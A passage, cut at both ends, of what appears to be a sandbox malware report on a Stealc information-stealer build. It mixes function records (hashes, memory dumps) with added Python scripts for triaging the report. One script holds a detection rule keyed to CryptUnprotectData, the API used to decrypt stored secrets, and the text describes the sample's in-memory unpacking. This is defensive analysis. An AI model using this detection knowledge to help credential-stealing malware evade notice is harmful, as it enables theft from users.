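        refs = [c.ref for c in self.apis]
        return (min(refs) - self.base, max(refs) - self.base) if refs else None


API_RE = re.compile(r"^• (?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^• (?P<key>[^:]+): ?(?P<val>.*)$")
OFFSET_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")


def parse_records(text):
    """Split report text into function records; a record starts at an
    'APIs' or 'Strings' header and ends at the next one."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):
            cur = FunctionRecord(kind=line)
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # plain section headers such as "Memory Dump Source"
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"].split(","), int(m["ref"], 16)))
            continue
        m = KV_RE.match(line)
        if m:
            key, val = m["key"].strip(), m["val"].strip()
            cur.fields[key] = val
            if key == "Source File":
                off = OFFSET_RE.search(val)
                if off:
                    cur.base = int(off.group(1), 16)
    return records


# Assumed watchlist (this example's own, not from the report): every API in the
# set must appear in one function for the rule to fire.
WATCHLIST = {
    "dpapi_unprotect": {"CryptUnprotectData"},   # DPAPI blob decryption
}


def triage(records, watchlist=WATCHLIST):
    """Return (rule, record index) for every function matching a rule."""
    hits = []
    for idx, rec in enumerate(records):
        names = {c.name for c in rec.apis}
        for rule, required in watchlist.items():
            if required <= names:
                hits.append((rule, idx))
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rule, idx in triage(recs):
        rec = recs[idx]
        lo, hi = rec.rva_range()
        print(f"{rule}: API ID {rec.fields['API ID']} at RVA {lo:#x}-{hi:#x} "
              f"(base {rec.base:#x}, opcode id {rec.fields['Opcode ID'][:16]}...)")
```

The RVA is what you carry over to the on-disk PE or to an IDA session opened on the hcaresult snapshot; the Opcode ID and Instruction Fuzzy Hash are what you carry over to other reports to find the same routine in other Stealc builds.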
Strings
Memory Dump Source
• Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID: ?$__ZN
• API String ID: 0-1427190319
• Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
• Instruction ID: b9253ee1eace5213dd0986cdf16a355dd23ef8a7f27ab2ed9e5e70be412e74c3
• Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
• Instruction Fuzzy Hash: BE724472908B919BC716CF16C88076AB7E6BFC5314F1A8A1DF9A55B291D370DC41CB82
Strings
Memory Dump Source
• Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID: m%_?
• API String ID: 0-1573591151
• Opcode ID: 204f2ef550d4e92ae86d34623f043e8396e82ff99e2826f642550e3b9fd2d775
• Instruction ID: 2fc3c73312b6a8fc5cfdd797b9ad1ac2b1064de54e0190cf96335c189b9f1149
• Opcode Fuzzy Hash: 204f2ef550d4e92ae86d34623f043e8396e82ff99e2826f642550e3b9fd2d775
• Instruction Fuzzy Hash: 96B2F7F39082149FE304AE2DEC8577ABBE9EF94720F1A453DEAC4C3744E63598058796
Strings
Memory Dump Source
• Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID: xn--
• API String ID: 0-2826155999
• Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
• Instruction ID: d106730460addccdb8fa4501f800fe6b15016b277f9ea7ecf5fd4c1b2990ff71
• Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
• Instruction Fuzzy Hash: 94A214B1C042688AEF18CB58C890BFDBBB5FF85300F1842AED55677281D7795E85CB62
APIs
Memory Dump Source
• Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Yara matches
Similarity
• API ID: __aulldiv
• String ID:
• API String ID: 3732870572-0
• Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
• Instruction ID: 0ae7a8a1284a1334880acbcbe97ce92f4927c0f6089ebb0d9088dee2a00c3a0e
• Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
• Instruction Fuzzy Hash: 2BE1D031A083459FC725CF28C890BAEB7E6EFC9300F56492DE4D99B291D731A845CB83
APIs
Memory Dump Source
• Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Yara matches
Similarity
• API ID: __aulldiv
• String ID:
• API String ID: 3732870572-0
• Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
• Instruction ID: dd43357317ce7b0039d00a4805a40daa293f728929d03922f3d878774a990c83
• Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
• Instruction Fuzzy Hash: DEE1A331B083119FDB24DE18C8A1BAEB7E6EFC5310F15892DE99A9B251D730EC458B47
Strings
Memory Dump Source
• Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID: UNC\
• API String ID: 0-505053535
• Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
• Instruction ID: 580b6b430ca6319c089b7ebce639aa6418ae94da1850cb5c81ef93dbbb507d7f
• Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
• Instruction Fuzzy Hash: E9E14C71D442658EEF10DF18C8843BEBBE2AB85318F59C16BD4646F392D3398D46CB90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID: $2W
• API String ID: 0-308605316
• Opcode ID: f2e1acc581b7a3b6793bbbef7bb2d155fac45e12691684853f51c07e6c0e374e
• Instruction ID: 8f2a59bbb625ecb1f8c42b12dc6754fae05192b65747723aaff5d2584b3d2075
• Opcode Fuzzy Hash: f2e1acc581b7a3b6793bbbef7bb2d155fac45e12691684853f51c07e6c0e374e
• Instruction Fuzzy Hash: D141F8F3B181005BF314A92DDCD477BF6DAEBD8310F2A863D9688D7784E97998064282
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: {#u|
                                        • API String ID: 0-2894770332
                                        • Opcode ID: f0241f2b75db2304ad6a7c0768503bcd6de328438727cdb941a285c9e5e48093
                                        • Instruction ID: cbd4eb6603b7f4a3bb3fc658acb6cc14d5429585fd949271a5558f7002ff3229
                                        • Opcode Fuzzy Hash: f0241f2b75db2304ad6a7c0768503bcd6de328438727cdb941a285c9e5e48093
                                        • Instruction Fuzzy Hash: 2441E5F3A096049FE3049E29EC8076AF7E6EF94324F1A893DE5C487744DA7948428B43
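The dotted identifiers in the Memory Dump Source lists above encode, among other things, the base address and page protection of each dumped region. The following is an added example (not Joe Sandbox code and not part of this report) that parses those identifiers and counts the regions that were writable and executable, which is the footprint of the in-place unpacking the report flags ("Detected unpacking (changes PE section rights)"). It assumes that the fourth field is the region base and the fifth is a Windows PAGE_* constant from winnt.h (the values 0x04, 0x40 and 0x80 seen here match PAGE_READWRITE, PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY exactly); the other fields are not documented on the page and are treated as opaque. The sample identifiers are copied from the block above.

```python
"""Decode Joe Sandbox memory-dump identifiers (added example, not report code).

Assumptions: in "<f0>.<f1>.<dump_id>.<base>.<prot>.<f5>.<f6>.<f7>.sdmp" the 4th
field is the region base address and the 5th a winnt.h PAGE_* protection value;
every other field is treated as an opaque string.
"""
import re
from collections import Counter
from dataclasses import dataclass

# winnt.h memory protection constants; the low byte holds exactly one of these.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Modifier bits that can be OR-ed onto the base protection (guard pages included).
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

SDMP_RE = re.compile(
    r"(?P<f0>[0-9A-Fa-f]{8})\.(?P<f1>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<rest>[0-9A-Fa-f.]+)\.sdmp"
)


@dataclass(frozen=True)
class Region:
    dump_id: str
    base: int
    prot: int

    @property
    def protection(self) -> str:
        """Human-readable protection, e.g. 'PAGE_EXECUTE_READWRITE' or 'PAGE_READWRITE|PAGE_GUARD'."""
        low = self.prot & 0xFF
        name = PAGE_PROTECTIONS.get(low, f"UNKNOWN(0x{low:02X})")
        mods = [n for bit, n in PAGE_MODIFIERS.items() if self.prot & bit]
        return "|".join([name, *mods])

    @property
    def writable_and_executable(self) -> bool:
        """True for pages that are both writable and executable: where unpacked code lands."""
        low = self.prot & 0xFF
        return low in EXECUTABLE and low in WRITABLE


def parse_sdmp(token: str) -> Region:
    """Parse one '<...>.sdmp' identifier; raise ValueError for anything else."""
    m = SDMP_RE.fullmatch(token.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump identifier: {token!r}")
    return Region(m["dump_id"], int(m["base"], 16), int(m["prot"], 16))


def parse_report_lines(lines):
    """Collect every dump identifier from 'Source File:' / 'Associated:' report lines.

    The report repeats the same list under every function, so the result is
    deduplicated and ordered by base address."""
    found = [parse_sdmp(tok) for line in lines for tok in re.findall(r"\S+\.sdmp", line)]
    return sorted(set(found), key=lambda r: r.base)


def summarize(regions):
    """The counts a triager wants first: how much of the dumped image is W+X."""
    return {
        "regions": len(regions),
        "writable_and_executable": sum(r.writable_and_executable for r in regions),
        "by_protection": dict(Counter(r.protection for r in regions)),
        "lowest_base": min(r.base for r in regions),
    }


# Constructed sample: the identifiers from one 'Memory Dump Source' block of this report.
SAMPLE_REPORT = """
Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
"""

if __name__ == "__main__":
    regs = parse_report_lines(SAMPLE_REPORT.splitlines())
    for r in regs:
        print(f"0x{r.base:08X}  {r.protection:<28} {'W+X' if r.writable_and_executable else ''}")
    print(summarize(regs))
```

Run against the block above, only the region at the image base 0x970000 (the PE header) is plain PAGE_READWRITE; the remaining fifteen regions are writable and executable, which is what a section-rights-changing unpacker leaves behind and what the report's "based on PE: true" dumps rebased to 0x970000 are meant to capture. The field interpretation is an assumption, so check it against Joe Sandbox's documentation before relying on the other fields.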
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction ID: adb18b3680311eaa858e096e013827f1e1fc459edc1722d5a0ce518dc13071d5
                                        • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction Fuzzy Hash: 6482F175900F448FD765CF29C880B92F7E5BF9A300F548A2ED9EA8B651DB30B545CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction ID: 322927ca2862d09e23cd3c48a045ba0e9d89973d1bbaf355a09d1b7c64253811
